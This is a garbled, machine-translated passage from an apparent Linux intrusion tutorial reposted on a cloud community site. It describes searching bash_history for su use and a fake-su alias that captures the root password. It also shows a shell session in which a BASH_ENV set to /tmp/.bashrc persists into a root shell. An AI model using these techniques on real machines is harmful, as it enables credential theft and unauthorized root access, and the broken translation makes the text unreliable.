Well, that's good, as we expected. Let's see how we use it.
grep su ~/.bash_history
Shows that this user has a special hobby using the SU login root account. We used to have a fakesu.c in this situation. Then modify. bash_profile, create individual names and things like that. Use Getpass to get root password, record, and then remove alias ... The key is that the administrator will be prompted for a password error when logging in with the correct password. Encounter a silly administrator may let this detail, and then enter the password on the OK. But some Non-human admin will be the fastest speed to check the system is the sign of intrusion, plus what, and this administrator to change the root password is almost certain. So stealing the password is useless. Well, the smart X-Men must know what I'm going to do. Oh, first look at the environment variable su after not
[Xiaoyu@localdomain ~]$ Echo $BASH _env
/tmp/.bashrc
[Xiaoyu@localdomain ~]$ su
Password:
[Root@localdomain xiaoyu]# Echo $BASH _env
/tmp/.bashrc
Ah oh, still in, OK, the end of the experiment, Combat:
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
